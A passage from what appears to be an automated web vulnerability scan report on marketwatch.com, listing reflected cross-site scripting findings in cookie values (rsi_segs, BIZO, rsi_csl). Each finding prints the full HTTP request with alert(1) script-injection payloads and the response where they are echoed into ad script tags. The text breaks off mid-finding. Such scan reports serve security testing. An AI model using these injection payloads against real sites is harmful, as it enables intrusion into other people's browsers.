Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_vnum=1307959980006%26vn%3D1; refresh=off; BIZO=biz=1053&; ASP.NET_SessionId=oz1fwf5bs4it123trqmlzxnf; __g_c=w%3A1%7Cb%3A3%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_cc=true; rsi_csl=lA; rsi_segs=G07608_10001fe1c5"><script>alert(1)</script>51f807aa8f0; _chartbeat2=g73giwkwwxj3e1nb; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Article_Futures%252520Movers_53B5F46A-7D06-11E0-915A-00212804637C%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13%25253Flink%25253DMW_story_in%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-MACHINE: secdfinwebp05
Date: Sat, 14 May 2011 10:38:05 GMT
Content-Length: 141755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script src="http://ad.doubleclick.net/adj/marketwatch.com/brokerdock;s=8_10001fe1c5"><script>alert(1)</script>51f807aa8f0;u=%5e%5elA;biz=1053;sz=230x25;tile=1;ord=726643700?" type="text/javascript">
...[SNIP]...

4.118. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13 [rsi_segs cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /story/citigroups-new-look-is-plainly-cosmetic-2011-05-13

Issue detail

The value of the rsi_segs cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 509ee'%3balert(1)//804f8172b67 was submitted in the rsi_segs cookie. This input was echoed as 509ee';alert(1)//804f8172b67 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /story/citigroups-new-look-is-plainly-cosmetic-2011-05-13?link=MW_story_investinginsightb HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_vnum=1307959980006%26vn%3D1; refresh=off; BIZO=biz=1053&; ASP.NET_SessionId=oz1fwf5bs4it123trqmlzxnf; __g_c=w%3A1%7Cb%3A3%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_cc=true; rsi_csl=lA; rsi_segs=G07608_10001509ee'%3balert(1)//804f8172b67; _chartbeat2=g73giwkwwxj3e1nb; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Article_Futures%252520Movers_53B5F46A-7D06-11E0-915A-00212804637C%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13%25253Flink%25253DMW_story_in%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-MACHINE: secdedtwebp01
Date: Sat, 14 May 2011 10:38:09 GMT
Content-Length: 141465

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
.Escort.addClient(
           ScrillaZilla.Client('#ad_PremiumContentBottom',
               {
                   ord : 919275682,
                   src : 'http://ad.doubleclick.net/adi/marketwatch.com/mutualfunds_jaffe;mc=MWRetWeek;s=8_10001509ee';alert(1)//804f8172b67;u=%5e%5elA;biz=1053;sz=571x100;tile=1;ord=',
                   width : '571',
                   height : '100',
                   
                   lateLoad : true,
                   refresh : false,
                   independentRefresh : false,
                   refreshRate : 48000
...[SNIP]...

4.119. http://www.marketwatch.com/story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390 [BIZO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390

Issue detail

The value of the BIZO cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3983e'-alert(1)-'1a648a25759 was submitted in the BIZO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390?Link=obinsite HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://traffic.outbrain.com/network/redir?key=f465737d830a35fc698cafafb4ce7caf&rdid=205292719&type=IMD_def_prd&in-site=true&req_id=cd9a83f96a2d455991d95bc48290df11&agent=blog_JS_rec&recMode=3&reqType=1&wid=102&imgType=0&version=37740&idx=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_vnum=1307959980006%26vn%3D1; refresh=off; BIZO=biz=1053&3983e'-alert(1)-'1a648a25759; ASP.NET_SessionId=oz1fwf5bs4it123trqmlzxnf; __g_c=w%3A1%7Cb%3A4%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_cc=true; rsi_csl=lA; rsi_segs=G07608_10001; _chartbeat2=g73giwkwwxj3e1nb; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-MACHINE: secdfpswebp04
Date: Sat, 14 May 2011 10:37:43 GMT
Content-Length: 104571

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
illaZilla.Client('#ad_BrokerButton1',
               {
                   ord : 1531063701,
                   src : 'http://ad.doubleclick.net/adi/brokerbuttons.marketwatch.com/personalfinance_story;pos=1;s=8_10001;u=%5e%5elA;biz=1053;3983e'-alert(1)-'1a648a25759;sz=288x40;tile=10;ord=',
                   width : '288',
                   height : '40',
                   
                   lateLoad : true,
                   refresh : false,
                   independentRefresh : false,
                   refreshRate : 480000,
                   refreshDomai
...[SNIP]...

4.120. http://www.marketwatch.com/story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390 [BIZO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390

Issue detail

The value of the BIZO cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1fbb"><script>alert(1)</script>a3254d0924a was submitted in the BIZO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390?Link=obinsite HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://traffic.outbrain.com/network/redir?key=f465737d830a35fc698cafafb4ce7caf&rdid=205292719&type=IMD_def_prd&in-site=true&req_id=cd9a83f96a2d455991d95bc48290df11&agent=blog_JS_rec&recMode=3&reqType=1&wid=102&imgType=0&version=37740&idx=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_vnum=1307959980006%26vn%3D1; refresh=off; BIZO=biz=1053&b1fbb"><script>alert(1)</script>a3254d0924a; ASP.NET_SessionId=oz1fwf5bs4it123trqmlzxnf; __g_c=w%3A1%7Cb%3A4%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_cc=true; rsi_csl=lA; rsi_segs=G07608_10001; _chartbeat2=g73giwkwwxj3e1nb; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-MACHINE: secdfpswebp05
Date: Sat, 14 May 2011 10:37:40 GMT
Content-Length: 104616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script src="http://ad.doubleclick.net/adj/marketwatch.com/brokerdock;s=8_10001;u=%5e%5elA;biz=1053;b1fbb"><script>alert(1)</script>a3254d0924a;sz=230x25;tile=1;ord=1338431719?" type="text/javascript">
...[SNIP]...

4.121. http://www.marketwatch.com/story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390 [rsi_csl cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390

Issue detail

The value of the rsi_csl cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57f72"><script>alert(1)</script>b7608fae4f2 was submitted in the rsi_csl cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390?Link=obinsite HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://traffic.outbrain.com/network/redir?key=f465737d830a35fc698cafafb4ce7caf&rdid=205292719&type=IMD_def_prd&in-site=true&req_id=cd9a83f96a2d455991d95bc48290df11&agent=blog_JS_rec&recMode=3&reqType=1&wid=102&imgType=0&version=37740&idx=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_vnum=1307959980006%26vn%3D1; refresh=off; BIZO=biz=1053&; ASP.NET_SessionId=oz1fwf5bs4it123trqmlzxnf; __g_c=w%3A1%7Cb%3A4%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_cc=true; rsi_csl=lA57f72"><script>alert(1)</script>b7608fae4f2; rsi_segs=G07608_10001; _chartbeat2=g73giwkwwxj3e1nb; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp01
Date: Sat, 14 May 2011 10:40:05 GMT
Content-Length: 104690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script src="http://ad.doubleclick.net/adj/marketwatch.com/brokerdock;s=8_10001;u=%5e%5elA57f72"><script>alert(1)</script>b7608fae4f2;biz=1053;sz=230x25;tile=1;ord=726643700?" type="text/javascript">
...[SNIP]...

4.122. http://www.marketwatch.com/story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390 [rsi_csl cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /story/medicare-social-security-finance-outlook-worsens-2011-05-13-